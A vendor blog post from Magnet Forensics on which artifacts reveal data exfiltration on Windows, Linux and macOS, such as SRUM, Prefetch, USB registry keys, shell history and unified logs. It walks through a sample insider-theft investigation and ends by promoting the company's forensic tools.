Investigating data exfiltration: key digital artifacts across Windows, Linux, and macOS

Data exfiltration—the unauthorized transfer of data from a system—can result in severe damage to organizations, making it critical for forensic investigators to identify key digital artifacts that reveal how, when, and where the breach occurred.

Tools such as Magnet Axiom Cyber, Magnet Axiom, and Magnet Nexus are essential in uncovering these critical pieces of evidence. These platforms allow investigators to efficiently search across devices, network logs, and cloud-based platforms, ensuring that no evidence is overlooked.

In this blog, we’ll discuss the key artifacts for investigating data exfiltration on Windows, Linux, and macOS systems. We’ll also present an example case to illustrate how these artifacts can be combined to “solve” a real-world exfiltration incident.

Key digital artifacts to examine in data exfiltration cases 

1. Windows artifacts

Windows is often the primary target for data exfiltration, and several critical artifacts can provide valuable insights during an investigation.

Event logs (Windows Event Viewer)

• Event logs are essential for tracking user activity and system processes. Key logs to analyze include:
  • Security logs (Logon/Logoff events)
  • File System Audit logs (Modifications to files, folder access)
  • PowerShell logs (Script execution, which might be used in data exfiltration)
  • Network logs (Connections to suspicious external servers)

Prefetch files

• Prefetch files provide insight into the execution of programs, particularly if an exfiltration tool was used (e.g., FTP clients, cloud sync tools). These files can tell when an application was executed and how often.

Shimcache (Application Compatibility Cache)

• This artifact stores information about executables that have been run on the system, even if the file has been deleted. Investigators can use this to trace the usage of data exfiltration tools.

Browser artifacts

• If data exfiltration occurred via the web, browser artifacts such as history, cookies, download logs, and cache can provide insight into the websites visited and files uploaded to cloud services or suspicious domains.

USB device history

• Artifacts related to USB activity can be found in the Windows Registry (e.g., SYSTEM\CurrentControlSet\Enum\USBSTOR). These can reveal if an external storage device was connected, potentially used for data exfiltration.

SRUM (System Resource Usage Monitor)

• SRUM is an invaluable artifact for data exfiltration forensics. It is a database located at C:\Windows\System32\sru\srudb.dat, and it tracks extensive details about system resource usage, including network activity, application usage, and data consumption. SRUM can reveal the amount of data sent and received by specific processes, helping investigators identify suspicious applications or network usage patterns indicative of data exfiltration.
  • For instance, if an unknown process was observed consuming significant network bandwidth during the time of the breach, SRUM could provide detailed information about the amount of data sent, which IP addresses were involved, and whether this data usage correlates with other suspicious events (such as USB device connections or FTP activity). This is particularly useful when the data exfiltration involved large data transfers that might have been missed in traditional network logs.SRUM also tracks resource consumption by background processes, which might include stealthy exfiltration tools designed to operate silently. Investigators can use SRUM data to correlate network activity with applications running at the time of exfiltration, providing a detailed timeline of the breach.

2. Linux artifacts

Linux systems require a slightly different approach, but they also hold valuable artifacts for tracing data exfiltration.

Shell history files

• Shell history (~/.bash_history, ~/.zsh_history, etc.) tracks user command-line input, potentially revealing commands used to transfer data (e.g., scp, rsync, curl, or wget).

Auth logs

• Authentication logs (typically found in /var/log/auth.log or /var/log/secure) provide details about user logins, privilege escalation, and SSH connections—crucial for identifying the vector of an external data transfer.

Network logs

• Network logs such as /var/log/syslog or /var/log/messages may reveal outbound connections. Investigators should look for abnormal outbound traffic to unknown IP addresses, especially those involving known data exfiltration techniques like FTP or HTTP.

File System Timestamps (MAC times)

• On Linux, file system timestamps (MAC times: Modified, Accessed, and Changed) for key directories (e.g., /home, /etc) can help identify when data was accessed or transferred.

Installed packages and running services

• Logs and configuration files in /var/log/apt/history.log (Debian-based) or /var/log/yum.log (RHEL-based) provide insights into any tools or packages installed that could facilitate data exfiltration.

3. macOS artifacts

macOS, while less common in enterprise environments, is increasingly targeted in data breaches. Key macOS artifacts to examine include:

Unified logs

• macOS Unified logs contain detailed system activity information, capturing various processes, network connections, and user interactions which are valuable for data exfiltration forensics.

System Integrity Protection (SIP) logs

• SIP logs may show attempts to disable protection mechanisms to allow malicious activity, including data exfiltration.

Keychain Access logs

• Investigators should check the Keychain Access logs to see if credentials or other sensitive information was accessed. This could indicate that data was exfiltrated via compromised credentials.

Application usage data

• macOS tracks app launches and usage history in databases located at /var/db/diagnostics. This can be critical for tracing if and when a suspicious app or browser was used for exfiltration.

External storage devices

• macOS stores logs for external storage devices, which can reveal if a USB drive or another external device was used for data exfiltration. The system.log and fseventsd logs can help correlate the timing of such activities.
  • One entry in Unified logs shows the volume name and mount time:

Example case: solving a data exfiltration incident

Scenario:

A mid-sized company suspects an insider exfiltrated sensitive data to a competitor. The initial tip came when unusual network activity was observed late at night, followed by the disappearance of a large set of financial documents. The system under investigation is a Windows workstation with access to the company’s internal file server.

Investigation process:

Step 1: Analyze network logs (Windows Event Logs)
Investigators begin by reviewing the Windows Event Logs, specifically looking at network activity logs during the time of the suspected breach. They discover multiple connections to an unfamiliar external IP address around 2:00AM.

Step 2: Check USB device history (Windows Registry)
In the Windows Registry, the forensic team checks for USB activity. The logs reveal that a USB device was connected to the workstation just before the suspicious network activity. The connected device had previously been seen on the same employee’s laptop.

Step 3: Inspect prefetch files (Windows Prefetch)
The Prefetch files show that an FTP client was launched for the first time around the time of the breach. This leads investigators to suspect the FTP client was used to upload data externally.

Step 4: Examine file access logs (File System MAC times)
By analyzing the MAC times of key directories, investigators confirm that the sensitive financial documents were accessed a few minutes before the USB device was connected and the FTP client was launched.

Step 5: Inspect shell history (Linux Servers)
Since the financial documents are hosted on a Linux file server, investigators inspect the shell history and authentication logs. They find evidence of an SCP command issued from the same user account, transferring files from the server to the workstation earlier that night.

Step 6: Review browser history (Windows Artifacts)
The browser history on the employee’s workstation shows visits to a competitor’s website, alongside uploads via a cloud storage service the night before the FTP transfer.

Outcome:

Based on the forensic analysis, the investigators piece together the timeline:

• The employee accessed sensitive documents on the Linux server using SCP.
• They copied the files to a USB device on their workstation.
• An FTP client was then used to upload these files to an external IP address linked to a competitor.
• Further analysis of browser history shows additional data was uploaded to a cloud storage service the day before the FTP transfer, solidifying the case of data exfiltration.

Investigating data exfiltration with key artifacts

Investigating data exfiltration requires carefully examining specific artifacts depending on the operating system in use. Windows, Linux, and macOS each provide unique forensic traces that can reveal the timeline of the breach.

With the help of specialized data exfiltration tools such as Magnet Axiom Cyber, Magnet Axiom, and Magnet Nexus, investigators can efficiently parse and analyze vast amounts of data from multiple sources—including cloud storage, endpoint devices, and external drives. These tools allow examiners to focus on the most critical artifacts and assemble a cohesive narrative of the data exfiltration, from initial access to final data transfer.

Understanding how to leverage these data exfiltration tools, combined with knowledge of key digital artifacts, will enable forensic examiners to build solid cases and respond swiftly to data theft incidents.

Additional resources

• Enhancing your incident response playbook with Magnet Axiom Cyber
• See how Magnet Nexus, a SaaS-based endpoint forensics solutions, helps DFIR investigation teams collect and analyze data from multiple endpoints in this overview webinar.
• Request a free trial of Magnet Axiom Cyber and Magnet Nexus to see for yourself how our solutions help to simplify data exfiltration investigations.